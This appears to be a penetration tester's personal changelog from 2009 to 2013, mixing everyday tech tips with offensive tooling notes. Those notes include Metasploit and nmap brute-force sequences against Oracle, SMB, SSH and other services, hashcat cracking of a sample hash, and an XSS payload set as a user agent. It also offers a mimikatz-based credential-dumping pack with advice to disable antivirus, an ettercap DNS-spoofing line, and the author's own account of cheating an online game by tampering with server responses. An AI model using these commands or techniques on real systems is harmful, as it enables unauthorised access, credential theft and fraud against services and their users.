INFO Processing took 2 seconds
INFO [Complete] Mon Apr 1 18:02:48 2013
|
03/07/2013 - Updated yahoo pipe for comics http://comics.rmccurdy.com
01/22/2013 - Updated OCLHashcat batch script to include rule based
attacks. batchcrack_rmccurdy.sh
12/20/2012 - # Virtualbox vbox headless vbs script
Set WshShell = WScript.CreateObject("WScript.Shell")
obj = WshShell.Run("C:\Progra~1\Oracle\VirtualBox\VBoxHeadless.exe -s
nnplus64", 0)
set WshShell = Nothing
11/26/2012 - Updated Quick with new Registry and file paths from
CCleaner ! quickclean.exe
11/01/2012 wifi tether wifi tethering t-mobile exhibit II 4g
* root phone
* remove IQ* and TetheringManager2.apk
mount -o remount,rw /dev/block/mmcblk0p15 /system
rm /system/app/IQ*.apk /system/lib/libiq_*
* reboot
* install FoxFi
* set agent tag to random or something like Mozilla/5.0 (Windows NT 5.1;
rv:14.0) >"'><script>alert('TMOBILEHATE')</script>
10/30/2012 - Oracle 7-10g DES(ORACLE)
Oclhashcat_plus GPU
input
: F35C90763516369B:DEV_MDS:WELCOME1
cudaHashcat-plus64.exe
--hash-type 3100 C:\egb\ocl\ORACLE.txt C:\egb\Dictionaries\PasswordsPro.dic
C:\egb\Dictionaries\Xploitz_clean.lst
09/26/2012 - split up fu and fu ripp
... fu.txt and fu_ripp.txt. also
updated masspwdumper.exe
to include wce.exe (windows credential editor)
08/27/2012 - fu.txt oclHashcat-plus
fu .. I know right... my fu.txt is getting out of hand.
08/19/2012 - quickkill.exe
Kills all unknown processes to quickly free up memory! tested XP/Win7
07/19/2012 I'm uh Pirate !
*New Disney Pirates game I played for two days before this 'testing'
*Using DROIDPROXY ( type HTTP ) / burpesuite CA per host
*Set phone in airplane mode ( just in case it forces 3G etc )
*In Firefox downloaded generated CA and imported into phone via .adb push
www.google.com.crt /excad/. ( not sure if it even matters in this case.. as the
post seem to be going over HTTP !?! )
*Rooted android phone
Replaing
a HTTP POST from unlocking chest I get . users request is old.:
Changing HTTP POST PostStamp numbers I get .NON VALID SIGNATURE.
Replace response from the HTTP POST from the server to 999:
WINNING
!
I will most likely get banned shortly .. ( I was ban about 20min after ;/) .
most online games ban for this type of .PUSHING. when a high level pushes or
gives items/currency to low level user.
07/3/2012 - BREAKOUT This
app will atempt to BREAK OUT of protected networks by using input IP,PORT as
HTTP and SOCKS proxies
06/10/2012 - 650KB/s over open proxies
with downloadthemall/rmccurdy.com/scripts/proxy/proxychains.conf
I will update the proxycheck script to include thist bit later.
05/22/2012
- some command line fu
# set power profile via command line
Powercfg.exe /SETACTIVE "Always On"
Powercfg.exe /SETACTIVE "Max Battery"
#Remove the .NET Credentials (Stored User names and Passwords)
Control keymgr.dll
04/24/2012
- Client_Enumeration_Java_Adobe_Reader_flash.zip Client side HTML/Java code
to enumerate Java, Adobe Reader and Flash Versions
04/24/2012 - Openvas in
Ubuntu
echo
'GSA_HTTP_ONLY=1' >> /etc/default/greenbone-security-assistant
/etc/init.d/greenbone-security-assistant
[ "$GSA_HTTP_ONLY" ] && [ "$GSA_HTTP_ONLY" = 1 ]
&& DAEMONOPTS="$DAEMONOPTS --http-only"
remove src from sources list along with matching the /etc/lsb-release ver too
add-apt-repository
"deb
http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.XX/
./"
grep
-ia open /etc/apt/sources.list deb
http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.04/
./ #deb-src
http://download.opensuse.org/repositories/security:/OpenVAS:/STABLE:/v4/xUbuntu_11.04/
./
if
you still have issues just run 'killall gsad;sleep 5;gsad --http-only
--listen=127.0.0.1 -p 9392
watch -d 'ps axuwww|grep nasl|grep -v grep'
view source omp -h 127.0.0.1 -p 9390 -u
admin -w password -X "$RANDOM`cat in|sed 's/$/,/g'|tr -d '\n'`"
04/18/2012 -
update_nmap_oracle_sids_userpass.exe
# sid enum using nmap and metasploits sid.txt 1307 sids in ~8 seconds
nmap -n --script=oracle-sid-brute -p 1521-1560 192.168.1.141
# try 1255 user/pass
# requires valid SID ( default is XE )
# Performed 1245 guesses in 3 seconds, average tps: 415
nmap --script oracle-brute -p 1521-1560 --script-args
oracle-brute.sid=XE -n 192.168.1.141
# oracle shell using OAT Oracle Audit Tool
ose.bat -s 192.168.1.141 -u SYS -p CHANGE_ON_INSTALL -d XE -t Windows
04/17/2012 - Metasploit with Oracle !
-------------------------------------------------------------------------------------
following
:http://www.metasploit.com/redmine/projects/framework/wiki/OracleUsage
2:10 PM 4/17/2012
-------------------------------------------------------------------------------------
# Remove ruby using apt or synaptic etc ..
apt-get remove ruby
# update and install 1.9.1 dev
apt-get update
apt-get install ruby1.9.1-dev -y
mkdir /opt
mkdir /opt/oracle
# copy zips to /opt/oracle
cp *.zip /opt/oracle
cd /opt/oracle
unzip basic-10.2.0.5.0-linux.zip
unzip sdk-10.2.0.5.0-linux.zip
unzip sqlplus-10.2.0.5.0-linux.zip
cd instantclient_10_2/
ln -s libclntsh.so.10.1 libclntsh.so
# add this to ~/.bashrc and also type it in current shell
export PATH=$PATH:/opt/oracle/instantclient_10_2
export SQLPATH=/opt/oracle/instantclient_10_2
export TNS_ADMIN=/opt/oracle/instantclient_10_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
export ORACLE_HOME=/opt/oracle/instantclient_10_2
# wget http://rubyforge.org/frs/download.php/65896/ruby-oci8-2.0.3.tar.gz
tar xvzf ruby-oci8-2.0.3.tar.gz
cd ruby-oci8-2.0.3/
LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/
export LD_LIBRARY_PATH
make
make install
# download msf .run bin installer
# I had to edit the /pentest/exploits/framework/.svn/entries and add www.
to the file so you could run svn update
cd /pentest/exploits/framework/
svn update
# run MSFconsole from /pentest/exploits/framework/ not the init scipt this will
allow for use of YOUR env and not the static one for MSF binary
cd /pentest/exploits/framework/
./msfconsole
#from msfconsole install ruby-oci8 gem
gem install ruby-oci8
If you still get the missing OCI error it is all ruby the oracle client loads
after
# oracle_login needs nmap > 5.50 !
wget http://nmap.org/dist/nmap-5.51.tgz
tar -xvf nmap-5.51.tgzm
cd nmap-5.51
./configure
make
make install
ln -s /usr/local/bin/nmap /usr/bin/nmap
--------------- msf stuff ---------
# as always you can spool log.log to save logfile or use screen -L
# brutes ~576 sids will eat targets file
use auxiliary/scanner/oracle/sid_brute
set RHOSTS file://home/rmccurdy/oracle
run
back
# This module attempts to authenticate 568 line USERPASS_FILE list
# requires SID
use auxiliary/scanner/oracle/oracle_login
set RPORTS 1521
set RHOSTS file://home/rmccurdy/oracle
set SID XE
run
back
# needs oci !!!
# This module uses a ~598 line list of well known default authentication
credentials to discover easily guessed accounts.
use auxiliary/admin/oracle/oracle_login
set RHOSTS file://home/rmccurdy/oracle
set RPORTS 1521
run
back
# needs oci !!!
# needs full login/password/sid audits database and or user
#
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/oracle/oraenum.rb
use auxiliary/admin/oracle/oraenum
set RHOST 127.0.0.1
set DBPASS TIGER
set DBUSER SCOTT
set SID ORCL
run
back
04/17/2012
- Configuring the Scrollback Buffer
By
default, the scrollback buffer only keeps the last 100 lines of text, which is
not enough for my typical interaction with Screen. I.ve found a setting of 5000
lines to be more than adequate for my usage. The number of scrollback lines can
be configured in your $HOME/.screenrc file, by adding the following
line:
defscrollback 5000
04/16/2012
- Block Facebook with Adblock Plus! :
Make new custom filter and add these three filters:
||facebook.com$domain=~www.facebook.com
||facebook.net$domain=~www.facebook.com
||fbcdn.net$domain=~www.facebook.com
04/13/2012 - cygwin_portable.zip
* NESSUS_PARSE.BAT ( parse Nessus .nessus XML files to CSV )
* NMAP.BAT ( scans top 20 ports from targets file and then does full
scan/automatic parse to CSV )
* NMAP_PARSE.BAT ( parse NMAP xml scans from -oA output )
* FIND_ROUTERS.bat ( automated search for routers to find other networks on
192. , 172. and 10. when you have no scope or want to find other networks/hosts
in a LAN 'in development' )
* WEBDUMP in /bin (This script will quickly download a large number of websites
first page then remove duplicates to find potential targets for attack
http://rmccurdy.com/scripts/web_dump.sh )
* Bash_Shell.bat (PERL RUBY and PYTHON support in a Cygwin Bash Shell )
Here is the download link ( tested in XP and WIN7 )
https://dl.dropbox.com/s/hwp8uqfdm7lxavb/cygwin_portable.zip?dl=1
04/12/2012
- masspwdumper.exe
This
is a pack/script to run a suite of password/cached credentials utility. You get
anything from saved internet cookies to plain text passwords to network/local
resources !
*
DISABLE UAC FIREWALL AND AV for best results
*
YOU NEED TO HAVE GUI FOR MPR Multi Password Recover.exe,Password Recovery
Bundle.exe and sometimes some of the carrot.exe options /ieco
/ff
INCLUDES:
*
mimikatz ( DUMP CLEAR TEXT PASSWORDS ! )
*
MPR Multi Password Recover.exe ( GUI tool )
*
Password Recovery Bundle.exe ( GUI tool )
*
fgdump.exe ( Dump password hash )
*
carrot.exe ( Suite of tools most of them are nirsoft.net )
https://dl.dropbox.com/sh/llw7unn0hlptigj/aC5YSuyosX/masspwdumper.exe?dl=1
04/10/2012
- News
[Tool update] - Gason: sqlmap plugin for burpsuite proxy
http://code.google.com/p/gason/
CIntruder: Cracking captcha from url
http://www.youtube.com/watch?v=0UoVV3Oxq8g
Free malware scanning and blacklist monitoring for websites
http://siteinspector.comodo.com/
01/17/2012
- UPDATED: proxycheck.sh
01/17/2012
- UPDATED: feeds.rmccurdy.com
# sonofsamy.wordpress.com
# exploit-db.com
# securinfos.info
# vupen.com
# professionalsecuritytesters.org
# info
# securitytracker.com
# news.securitytracker.com
# taosecurity.blogspot.com
# gossamer-threads.com
# net-security.org
# kb.cert.org
# cert.org
# milw0rm.com
# seclists.org
# us-cert.gov
# f-secure.com
# securityvulns.com
# osvdb.org
# securityfocus.com
# wordpress.com
# blogspot.com
# twitter.com
12/30/2011 - I.m bringing sexy back !! well ..
1989 ... After Dark screensaver Flying Toasters After Dark screensaver Flying Toasters.exe No midi thank
god !!! bit wonkey you can look at the install.bat and .reg files. for some
reason it needs full R/W to its HKLM install path in the registry. Tested on XP
and WIN7 !
12/15/2011 - Disable
Metasploit / Enable Metasploit in windows.
# disable stop script
net stop "Metasploit Pro Service"
net stop "Metasploit Thin Service"
net stop metasploitPostgreSQL
sc config metasploitProSvc start= disabled
sc config metasploitThin start= disabled
sc config metasploitPostgreSQL start= disabled
# enable start script
sc config metasploitProSvc start= auto
sc config metasploitThin start= auto
sc config metasploitPostgreSQL start= auto
net start "Metasploit Pro Service"
net start "Metasploit Thin Service"
net start metasploitPostgreSQL
11/01/2011
- UDDATED Proxycheck.sh
good.txt is updated weekly over 5K proxies tested ~500 HTTP
06/23/2011 - Here are some
MSF/SET and NMAP notes for brute force (for MSF for M$ ),VNC bypass and Airbase
:
## MSF
auxiliary/scanner/smb/pipe_auditor
normal SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor
normal SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2
normal SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares
normal SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers
normal SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain
normal SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login
normal SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid
normal SMB Local User Enumeration (LookupSid)
# vnc bypass oneliner
nmap -sV -sC -iL c:\temp\vnc.txt -p 5900
# ssh logins
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 127.0.0.1
set USER_FILE "C:/wordlist/password_small.txt"
set RHOSTS_FILE "C:/wordlist/targests.txt"
run
back
use auxiliary/gather/dns_enum
set DOMAIN domain.com
run
#smb
set RHOSTS 10.21.1.37
use auxiliary/scanner/smb/smb_login
set RHOSTS 127.0.0.1
set USER_FILE "C:/wordlist/users.txt"
set PASS_FILE "C:/wordlist/2.txt"
set VERBOSE false
set THREADS 16
run
# http
use auxiliary/scanner/http/http_login
set AUTH_URI /folder?dcPath=ha-datacenter
set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
set VERBOSE true
run
back
# telnet
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 127.0.0.1,49,50
set PASS_FILE "C:/wordlist/password_small.txt"
set THREADS 254
run
back
# mssql
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
set USERNAME sa
set VERBOSE false
run
back
#ftp
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
run
#snmp
use auxiliary/scanner/snmp/snmp_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
set VERBOSE false
run
## SET
https://docs.google.com/document/d/11QDLxgCxc2mBEOe8gEPTooQ1zD_KvzuuThRCMLKeE80/edit?hl=en_US
08/10/2011
- Updated iKAT . Interactive Kiosk Attack Tool http://console.rmccurdy.com
06/23/2011
- Information Leakage
FOCA . Document meta-data retrieval and analysis, domain enumeration
Maltego . Transform/processing engine for correlation and linking objects
Creepy . Geo-location information gatherer http://ilektrojohn.github.com/creepy
Shodan . Web server search engine
Metagoofil . Document meta-data command-line tool
Wikto . web server vulnerability and folder enumeration
Bespoke scripts . contact me offline for some quick and dirty bash scripts
which automate some tasks
u = Number of usernames enumerated
nf = Number of network folders enumerated
e = Number of email addresses
vs = Number of vulnerable internal software versions
wv = Number of known vulnerabilities in version of web server
ev = Number of vulnerabilities in version of mail server
gg = Number of Google Groups postings
r = Number of robots.txt entries
Exposure = u+nf+e+vs+wv+ev+gg+r / 9
RSA = (3+3+2+2+1+1+4+1)/8 = 17/9 = 2
Problem with such calculations is lack of account for context Un disclosed
source
06/23/2011 -
Nice technique for opening cmd:
1) Open MSPaint and change image attributes to: Width=6 and Height=1 pixels.
2) Set pixels values to (from left to right):
1st: R: 10, G: 0, B: 0
2nd: R: 13, G: 10, B: 13
3rd: R: 100, G: 109, B: 99
4th: R: 120, G: 101, B: 46
5th: R: 0, G: 0, B: 101
6th: R: 0, G: 0, B: 0
3) Save it as 24-bit Bitmap (*.bmp;*.dib)
4) Change it's extension from bmp to bat and run.
Source:
http://www.digitalwhisper.co.il/0x26/ 06/02/2011 -
theHarvester.py email Harvester
https://github.com/laramies/theHarvester
./theharvester.py -d microsoft.com -l 50 -b google
./theharvester.py -d microsoft.com -l 50 -b bing
./theharvester.py -d microsoft.com -l 50 -b pgp
./theharvester.py -d microsoft.com -l 50 -b linkedin
./theharvester.py -d microsoft.com -l 50 -b google-profiles
./theharvester.py -d microsoft.com -l 50 -b exalead
05/18/2011 - Malware Analysis
Also been messing with Malware Analysis tools. Let me know if you
want any more info on these. Still a total noob doing crackmes.
·
Portable
IDA Pro with IDAPython/stealth plug-in
·
Portable
Reflector a Class browser and analysis tool for .NET >=4 Decompile
·
malware_analyser
3.0
·
yara
exe with sigs ( needs more work.. )
·
DeFixed_Edition_v2
( olly / ton plug-in etc )
http://www.openrce.org/downloads/
http://tuts4you.com
http://crackmes.de
http://www.youtube.com/watch?v=zvWc-XsBKrA
http://www.youtube.com/watch?v=jIaImASmto4
http://blip.tv/carolinacon/yara-and-python-the-malware-detection-dynamic-duo-mjg-michael-goffin-5123342
http://www.pentestit.com/2011/03/08/cuckoo-malware-analysis-sandbox/
http://www.pentestit.com/2011/04/20/update-malware-analyzer-v30/
http://www.pentestit.com/2011/03/23/update-yara-v15/
http://www.malwareanalyser.com/home/
As a free service:
* Norman SandBox (http://www.norman.com/security_center/security_tools/)
* Anubis (http://anubis.iseclab.org)
* CWSandbox (http://www.mwanalysis.org/)
* ThreatExpert (http://www.threatexpert.com)
* Comodo Camas (http://camas.comodo.com)
* MalBox (http://malbox.xjtu.edu.cn)
Commercial products:
* Norman SandBox (http://www.norman.com/products/sandbox_malware_analyzers/en)
* GFI Sandbox (http://www.sunbeltsoftware.com/Malware-Research-Analysis-Tools/Sunbelt-CWSandbox/)
* Joe Sandbox (http://www.joesecurity.com)
* ThreatExpert ?
Freeware:
* Buster's Sandbox Analyzer (http://bsa.isoftware.nl)
Open Source:
* Cuckoo Sandbox (http://www.cuckoobox.org)
* Truman Sandbox (http://www.secureworks.com/research/tools/truman/)
* ZeroWine (http://sourceforge.net/projects/zerowine/)
* ZeroWine Tryouts (http://zerowine-tryout.sourceforge.net/)
04/26/2011 - Updated Yahoo movies feed movies.html
04/12/2011 - Yay mod_bw
BandwidthModule On
ForceBandWidthModule On
LargeFileLimit * 1000 10000
MaxConnection all 3
03/28/2011 - Sick of setting file associations ? this is what I use on my
portable apps ! acc.bat.txt
03/06/2011
- Portable virtual windows !?!? http://fcportables.blogspot.com/2011/01/portable-microxp-2011.html
using
QEMU to load ISO files
http://milky.manishsinha.net/2008/07/10/using-qemu-on-windows/
03/1/2011 - Updating flash in firefox the right way.... http://www.varesano.net/blog/fabio/installing%20flash%20player%20plugin%20firefox%20without%20having%20administrator%20access%20or%20premissions
also neat is http://ninite.com
02/28/2011 - Normal cygwin/ruby/perl 400megs 22K files .. Cameyo packaged 121
megs Portable Cygwin http://db.tt/qp2nKi5
Run the EXE and wait a long time if you still have errors wait close and reopen
contains ruby/perl/make/c++/automake/screen
02/28/2011 - Go away bots .. I have no PHP here .. RewriteCond %{QUERY_STRING}
^.*\&.*$ [NC]
02/26/2011 - Fixed my Hacker Safe logo
02/26/2011 - Proxbrute Proxmark3 Brute force RFID http://www.proxmark.org/forum/topic/713/proxbrute/
02/23/2011 - Updated yahoo pipe for comics http://comics.rmccurdy.com
01/21/2011 - Updated http://feeds.rmccurdy.com
twitter.com
blogspot.com
wordpress.com
securityfocus.com
osvdb.org
securityvulns.com
f-secure.com
us-cert.gov
seclists.org
milw0rm.com
cert.org
kb.cert.org
net-security.org
gossamer-threads.com
taosecurity.blogspot.com
news.securitytracker.com
securitytracker.com
professionalsecuritytesters.org
vupen.com
securinfos.info
exploit-db.com
rmccurdy.com
sonofsamy.wordpress.com
01/21/2011 - john 1337 speak worlist gen:
The default john.conf includes some rules like that, enabled for "single
crack" mode only by default. You may copy the lines between these two
comments:
# The following 3l33t rules are based on original Crack's dicts.rules
l/asa4[:c]
l/ese3[:c]
l/lsl1[:c]
l/oso0[:c]
l/sss$[:c]
...
l/asa4/ese3/lsl1/oso0/sss$[:c]
# Now to the prefix stuff...
into the [List.Rules:Wordlist] section to have them enabled for wordlist mode
as well. usage: john -w=wordlist --stdout --rules
11/13/2010 - FLoP's fpg false positive generator for IDS:
Static BIN for BT4 : FPG.zip
Fpg: http://www.geschke-online.de/doc/c2398.html
Fpg src : http://www.geschke-online.de/FLoP/src/FLoP-1.6.1.tar.gz
11/10/2010
- Full Update Guide - Fender/1.2 32A (myTouch 3G 1.2 / Fender LE
(3.5mm jack) version) I can't bring myself to mod it yet but I did get root
with Universal Androot 1.6.2 beta 5 apk temp root for the current T-mobile
build
10/05/2010 - RS links are all dead and gave up on
yahoo pipes regex is hit or miss for 3 weeks ... movies.html
10/02/2010 - lighttpd FTW :
# limit max connections per ip and limit bandwidth
server.kbytes-per-second = 10
evasive.max-conns-per-ip = 2
connection.kbytes-per-second = 10
09/13/2010
-
Sipdroid / sip.sipdiscount.com
\+*1*(.*),1\1
08/01/2010 -
Creative Loafing:
week http://rmccurdy.com/scripts/clatl.com.html
weekend http://rmccurdy.com/scripts/clatl.com_ss.html
Atlanta Events Calendar - Search Upcoming Events in Atlanta:
http://feed43.com/atlantanetrmccurdydotcom.xml
Atlanta Motor Speedway | Events
http://feed43.com/atlantamotor_rmccurdydotcom.xml
Atlanta, GA Events and Attractions by Citysearch
http://feed43.com/citysearch_rmccurdydotcom.xml
funny farm comedy club
http://feed43.com/funnyfarmcomedyclubatlanta.xml
The Punchline - Atlanta's premier comedy club!
http://feed43.com/thepunchlineatlanta.xml
07/14/2010 - Tutorial WIM image files wimfltr.sys
Windows Image File Filter Driver command line install
I have an H drive ( using junction to link C:\users\internet\Documents\my
dropbox to h:\ ) I wanted to easily update files that triggerd AV so I zipped
them up. I update the zip often and was testing for other options and this is
what I tried.
* h:\junction.exe -s "C:\users\internet\Documents\my dropbox" h: this
is howto change location of dropbox sync :)
* google for the drivers ImageX_x86
* install the driver
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128
.\ImageX_x86\wimfltr.inf
* create an image of a DRIVE ( cannot be mapped drive OR junction 'ln for
windows' )
.\ImageX_x86\imagex.exe /capture d:\ c:\twf.wim "WIM Compress"
/compress maximum
* umount image
.\ImageX_x86\imagex.exe /unmount /commit c:\cygwin
* mount image
.\ImageX_x86\imagex.exe /mountrw .\cygwin.wim 1 c:\mount
* even with 'maximum' compresstion images are larger then the source files in
most cases... ???
* 80meg zip of Cygwin ~300 unzipped becomes 600 WIM file ???
* requires admin rights to install drivers but still beats zipping and
unzipping items that trigger AV
reference: http://technet.microsoft.com/en-us/library/cc749447%28WS.10%29.aspx
06/12/2010 - low on disk space android G1 find / -name traces.txt -exec rm -Rf
{} \; something kept crashing while I was AFK and caused this traces.txt file
to get huGe
06/05/2010 - *lix/windows full disk encryption 'part crypt' on the cheap !
06/03/2010 - http://comics.rmccurdy.com huge mashup of comics!
http://pipes.yahoo.com/pipes/pipe.run?_id=ccd5e025249a09a9358ede1d3e238eab&_render=rss
05/30/2010 - yahoo new dvd A or B after 2009 > nzbindex.nl search
05/27/2010 - Android stream ripper http://www.greencode.me/imusic apk:
http://tinyurl.com/imusic1
04/30/2010 - QuranReciter http://www.ShaPlus.com Friend was asking about the
software so justa re-visit
04/29/2010 - Dropbox portable any path without "my dropbox" in M$ ...
DropboxDataWrapper DropboxPath FAILSAUSE
Requirements:
* Administrator ( possibly for dropbox advanced options )
* NTFS on the host computer !
* BACKUP BEFORE YOU DO ANYTHING !!!
Setup:
* Download DROPBOX
Recommended using the potable dropbox ICE because it has (UsbGuard (0.5.3) -
Prevents Data Loss by killing DropBox.exe if you accidentally unplug your usb
drive (included)
DropBox Portable ICE 0.5.3 -SuPPoRT aLL DRoPBoX VeRSioNs | Updated : 11-04-2010
http://dl.dropbox.com/u/5313411/Portable%20DropBox%20ICE%200.5.3.3%20%2B%20DropBox%200.8.32.rar
* Download Junction v1.05 from sysinternals .symbolic links, where a directory
serves as a symbolic link to another directory on the computer..
* Start dropbox
* Get the link to your dropbox folder path
* Create the sym link to whatever path you like example
rd /q/s "C:\Documents and Settings\internet\My Documents\My Dropbox"
Junction.exe "C:\Documents and Settings\internet\My Documents\My
Dropbox" h:\
To delete a sym link use this command:
Junction.exe -d "C:\Documents and Settings\internet\My Documents\My
Dropbox"
NOTES: there is a time tradeoff the dropbox.cache folder get queried a LOT and
other I/O is sent to the target I would say for 16K files ~2gigs it took
~20-30min where as if it was just a read from the flash disk it would be under
10min
04/26/2010 - ROUTER DIED server was down for about 5hrs today if anybody but
bots noticed ...
04/23/2010 - Metasploit
meterpreter cheat sheet reference.html All the meterpreter commands I could
find / create
04/19/2010 - sprint
login script curl .php.txtSprint login script using php / curl
04/16/2010 - UDDATED http://feeds.rmccurdy.com
04/15/2010 - UDDATED Proxycheck.sh good.txt is updated weekly
04/14/2010 - konika
script users scan to email for 353 and 350.sh.txtbash/curl script to parse
XLS contact list and add it to konika 353 and 350 printers :)
04/14/2010 - movamp.zip Portable AMP Portable apache / php / phpmyadmin
/ MySQL only 10megs ! change the httpd.conf paths and wala !
03/30/2010 - FIXED Yahoo rotten tomatoes newzbin nzb DVD sabnzbd downloader
03/01/2010 - To set up Yahoo E-Mail in Android:
log-in to your yahoo mail
go to Options, then Account, followed by .Add or edit an account.
select .Account Information. on the left
on the " Preferred Content," change it to Yahoo Asia
- Make
sure Wi-Fi is turned off
- Press
the E-Mail icon (the default Android E-Mail application)
- Enter
your Yahoo E-Mail address and password
- Press
.Manual Setup. in the lower left hand corner
- For
.Incoming Server Settings. set the IMAP server to .imap.mail.yahoo.com.
and the Port to 143
- For
.Outgoing Server Settings. set the SMTP Server to
.smtp.mobile.mail.yahoo.com. and the Port to 587
- Check
.Require sign-in. and press Next
- Select
how often your phone will check for Email, and choose default options
- Give
the account a name and set your display name for outgoing messages
02/23/2010
- Yahoo rotten tomatoes newzbin nzb DVD sabnzbd downloader
Rss feed of 'good' movies to aim at SABnzbd
02/18/2010 - quickbaksmali.zip
* requires java ! in %PATH% !
* just place the java_ee_sdk-5 folder to make it portable !
* put the APKS files in the folder APKS
* you (can) edit the job2.bat with your keytool/key info etc ..
* run the baksmali.bat
* make your changes etc
* run the smali.bat
you should see the updated \META-INF folder in the 'new' apk
and the classes.dex should be new.
02/18/2010 - NMAP
FOR ANDROID CROSS COMPILE ARM
02/18/2010 - chsh: entry inconsistent or change shell in FreeBSD `vipw;chsh -s
/bin/PATHTOSHELL` vipw != vi /etc/passwd ...
02/04/2010 - Updated LFI.txt
http://ha.ckers.org/weird/rfi-locations.dat
01/07/2010 - Full
Update Guide - G1/Dream Firmware to CyanogenMod - CyanogenMod Wiki
01/07/2010 - MYTHTV
ON UBUNTU 9.10 1TB RAID1
12/08/2009 - Portable Metasploit 3.4-dev svn r7752 Portable_Metasploit_3.4-dev_svn_r7752.exe
12/01/2009 - FreeBSD rtld Lets Local Users Gain Root Privileges http://rmccurdy.com/scripts/downloaded/localroot/freebsd/
binary for 7.2
11/30/2009 - HD on the Mythbox ! Thank you Kimball !
* Panasonic TC - P50X1 - 50" plasma panel - 720p
* VGA compatible controller: nVidia Corporation NV40 [GeForce 6800 GT] (rev a1)
* Intel(R) Pentium(R) 4 CPU 3.00GHz
* WinTV-PVR-500 MC-Kit Tuner
* MemTotal: 512572 kB
11/20/2009 - android busybox nmap G1 android port scanner ...sort of
The busybox I have on my phone does not have pscan here is one to download:
* keep it the same name and COPY to /data/local/bin
cp /sdcard/busybox /data/local/bin/
chmod 775 /data/local/bin/busybox
pscan.sh 192.168.0
http://rmccurdy.com/stuff/G1/busybox
http://rmccurdy.com/stuff/G1/pscan.sh
more android stuff : http://delicious.com/operat0r/android
* this is by no means NMAP ! still waiting for a nmap for android
11/12/2009 - UPDATED/FIXED feeds.rmccurdy.com
- 30 feeds ( to be added secunia.com if I can )
http://www.securityfocus.com/rss/vulnerabilities.xml
http://seclists.org/rss/bugtraq.rss
http://seclists.org/rss/fulldisclosure.rss
http://seclists.org/rss/pen-test.rss
http://seclists.org/rss/incidents.rss
http://seclists.org/rss/dailydave.rss
http://seclists.org/rss/webappsec.rss
http://seclists.org/rss/vulnwatch.rss
http://feeds.feedburner.com/HelpNetSecurity
http://www.us-cert.gov/channels/alerts.rdf
http://www.us-cert.gov/channels/techalerts.rdf
http://www.kb.cert.org/vuls/atomfeed?OpenView&start=1&count=30
http://milw0rm.com/rss.php
http://www.net-security.org/dl/bck/vuln.rss
http://news.securitytracker.com/server/affiliate?61D319BD39309004
http://feeds.feedburner.com/darknethackers
http://feeds.feedburner.com/schneier/fulltext
http://www.professionalsecuritytesters.org/backend.php
http://www.f-secure.com/weblog/weblog.rss
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure.xml
http://feeds.feedburner.com/Vitalsecurity-org
http://taosecurity.blogspot.com/feeds/posts/default
http://securityvulns.com/informer/rss.asp
http://www.vupen.com/exploits.xml
http://osvdb.org/feed/vulnerabilities/latest.rss
http://rmccurdy.com/scripts/vupen-security.rss
http://rmccurdy.com/scripts/vupen-linux.rss
http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml
http://feedity.com/rss.aspx/ath-cx/UldUWlFU
http://www.securinfos.info/english/security-advisories-alerts/security-advisories.xml
11/11/2009 - ettercap + echo www.google.com A 75.131.195.228 > etter.dns =
easy rickroll
11/11/2009 - FIXED limit max number of connections in apache ${fwcmd} add 10
allow tcp from any to any 80 out via dc0 limit dst-addr 2 ( I had issues with
huge number of FIN_WAIT_2 )
11/11/2009 - Server boot drive (80gig) failed clean 7.2 freebsd install !
11/11/2009 - UPDATED SNORTUPDATE.sh script fixed some of syntax errors etc ..
10/03/2009 - UPDATED the nikto_v20 and
nikto_v10 files takes a webinspect > privoxy log and downloads latest
nikto and combines with urls.txt a RFI list I update and converts them all to
nikto 2 and nikto 1 db formats.. to be used with w3af,nikto and wikto etc ..
16339 lines 1.6 megs
09/26/2009 - G1 T-mobile Root
08/26/2009 - FIXED quickvnc.exe
Fixed now only looks for established connection running winvnc.exe to fix
strange issues not showing the remote host ...
08/26/2009 - FIXED OEM.EXE
overwrites system and system32 ini and bmp files OEMLOGO.BMP and OEMINFO.INI
08/21/2009 - UPDATED http://tw.rmccurdy.com
Script to ripp any army in MTW2 can be adapted to use in MTW/RTW etc ..
07/24/2009 - DONATE http://www.ihackcharities.org
06/24/2009 - ADDED fix for clicking time in systray for windows grants everyone
http://rmccurdy.com/scripts/allow_time_systray_windows.exe
reference: http://blogs.msdn.com/aaron_margosis/archive/2005/02/11/371474.aspx
06/19/2009 - ADDED Scribd ripper script http://rmccurdy.com/scripts/scribd_ripper.php?varpdf=15730844
change the number to the document ID wala !
04/21/2009 - Proxycheck.sh
Updated still lame but it works... good.txt is updated weekly
04/17/2009 - sslstrip
04/13/2009 - ADDED VIDEO 30 Days: Outsourcing part1 part2
03/23/2009 - ADDED Portable SwfScanner Screenshot
03/19/2009 - ADDED myipneighbors.bash.txt Idea of this lame script is to find
possible vuln params on myipneighbors search results
02/23/2009 - ring.jpg
02/19/2009 - UPDATED Snort/Snotsam ( now I am running more current
snort/snortsam and update script is WAY better ... )
www.intodns.com
www.iptools.com
www.freednsinfo.com
network-tools.com
dnstools.iball.id.au
www.iball.id.au
dnstools.iball.id.au
www.diggip.com
www.dnsenquiry.com
www.net-toolkit.com
www.dnscolos.com/free
www.mydnstools.info
02/05/2009 -
